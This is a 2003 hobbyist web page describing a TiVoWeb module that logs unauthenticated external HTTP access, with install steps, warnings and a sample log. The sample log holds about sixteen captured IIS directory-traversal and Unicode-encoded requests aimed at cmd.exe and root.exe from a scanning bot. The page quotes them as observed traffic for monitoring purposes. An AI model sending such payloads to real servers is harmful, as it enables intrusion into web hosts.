Logging httpd-tt.tcl module

The mods in this module will log accesses from outside your local network that are not authenticated. It's only of use to you if your TiVo is connected to the outside world and you've enabled TiVoWeb's security by putting a username and password in tivoweb.cfg. :)

Accesses from outside your local network from hosts that haven't authenticated with the username and password you set up will be logged.

Note - you'll probably see entries for some of your own accesses. HTTP normally requests authentication on the first access from a host, so the first connection from a host won't be authenticated.

WARNING: If for some reason the mods in this module don't work on your TiVo, you won't be able to shut down TiVoWeb. The only way out of this is to replace the original module and reboot your TiVo.

The mods rely on a call to 'ifconfig -i' to find out your local network details. Before you load this module check that running 'ifconfig -i' on your TiVo gives an output similar to this:

bash-2.02# ifconfig -i
eth0      Link encap:Ethernet  HWaddr 00:0B:AD:BA:BE:01
          inet addr:192.168.123.1  Bcast:192.168.123.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2867 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2674 errors:0 dropped:0 overruns:0 carrier:0 coll:0
          Interrupt:29

To install: load the module to the tivoweb-tcl directory and Quit and restart TiVoWeb.

If you're unable to access TiVoWeb after loading the module, reload the original httpd-tt.tcl module and reboot your TiVo.

External accesses will be logged in /var/log/httpd which can be accessed through the TiVoWeb Log module. The log format is: <yyyymmdd:hhmmss> <source ip address>:<source port> <HTTP request> (NB. Times are GMT and the log isn't ever deleted so you'll need to keep an eye on the size of it.

Here's a sample that got logged on my TiVo a couple of hours after loading the module:

20030103:175827 81.6.239.85:3282 GET /scripts/root.exe?/c+dir HTTP/1.0
20030103:175827 81.6.239.85:3293 GET /MSADC/root.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3304 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3311 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3314 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3317 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3319 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175828 81.6.239.85:3321 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175829 81.6.239.85:3323 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175829 81.6.239.85:3328 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175829 81.6.239.85:3329 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175829 81.6.239.85:3330 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175829 81.6.239.85:3332 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175830 81.6.239.85:3333 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175830 81.6.239.85:3334 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
20030103:175830 81.6.239.85:3335 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

Hmmm... a 'winnt' directory on a TiVo... Uh-huh ;P


Home Last updated: 21st May 2003